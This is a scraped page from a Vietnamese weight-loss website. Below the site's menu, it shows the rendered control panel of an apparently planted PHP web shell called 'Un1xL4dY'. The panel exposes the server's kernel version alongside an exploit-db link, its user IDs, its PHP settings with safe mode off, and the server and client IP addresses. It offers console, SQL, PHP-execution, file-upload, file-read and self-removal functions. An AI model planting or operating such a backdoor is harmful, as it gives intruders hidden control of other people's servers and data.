• Thực đơn giảm cân
  • Ăn kiêng
  • Giảm mỡ bụng
  • Giảm cân nhanh
  • Ăn giảm cân
  • Giảm béo
  • Chế độ ăn kiêng
  • Bí quyết giảm cân
  • Phương pháp giảm cân hiệu quả
  • Thể dục giảm cân
  • Thuốc giảm cân
giamcan-ankieng.com - Un1xL4dY
Uname:
User:
Php:
Hdd:
Cwd:
Linux ns311448.ovh.net 3.10.23-xxxx-std-ipv6-64 #1 SMP Tue Mar 18 14:48:24 CET 2014 x86_64 [exploit-db.com]
10024 (giamcan) Group: 2522 (?)
5.3.3 Safe mode: OFF [ phpinfo ] Datetime: 2014-11-24 01:18:30
1 B Free: B (0%)
u--------- [ home ]

Server IP:
188.165.207.112
Client IP:
50.16.75.46
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ Self remove ]

File manager

Can't open this folder!
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Execute:
Upload file: (Not writable)